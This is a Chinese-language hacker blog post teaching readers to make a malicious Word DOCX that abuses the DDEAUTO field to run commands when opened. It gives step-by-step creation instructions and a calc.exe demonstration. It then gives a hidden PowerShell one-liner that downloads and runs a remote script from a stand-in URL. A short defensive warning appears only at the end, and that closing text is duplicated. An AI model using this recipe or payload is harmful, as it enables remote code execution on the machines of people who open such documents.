DDE協定作用是微軟Windows與Office在不同軟體中交換資料。 這個專業名詞非常高大上, 但在具體做法上卻是異常簡單, 海陽頂端駭客今天就教你一招, 一分鐘學會這個惡意DOCX文檔製作, 打開就能執行命令。
一、具體製作方法
1、首先右鍵在桌面新建一個word文檔, 然後插入域。 在WORD檔中點擊插入, 選擇文檔部件下拉清單裡的域。
2、插入域時, 選擇 = (Formula)。
3、插入之後, 在異常的公式結尾上選擇切換功能變數代碼。
4、代碼處把以前”= * MERGEFORMAT“的刪除, 重新修改為:
{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" }
5、之後, 右鍵更新域, 在下圖中點擊是, 保存文檔為docx格式即可。
二、製作成功的文檔打開演示
我做了個動畫,
如何把計算器換成你想要的命令, 你可以選擇用Powershell。 具體命令你可以參考《有趣的命令列系列——駭客執行PowerShell腳本的N種姿勢》這篇文章。 舉一個小示例, 如命令改成:
{ DDEAUTO c:\Windows\System32\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://url/evil.ps1');powershell -e $e "}
駭客文章總是看的人很少, 推薦量也少, 我就默默地寫吧, 大家放心好了, 我的每篇駭客文章都是乾貨, 而且都有實踐的。 歡迎關注海陽頂端, 你會學到更多的駭客知識。 為了讓頭條分類到駭客領域, 所以結尾我又加了八個駭客關鍵字, 並且在這句話上配了一張會讓封面比較好看的駭客酷圖, 不信你數一數這句話上有幾個駭客。綜上,如果你遇到打開docx文檔有這樣的提示,請謹慎,不要點擊。另外,注意升級自己的office軟體。
不信你數一數這句話上有幾個駭客。綜上,如果你遇到打開docx文檔有這樣的提示,請謹慎,不要點擊。另外,注意升級自己的office軟體。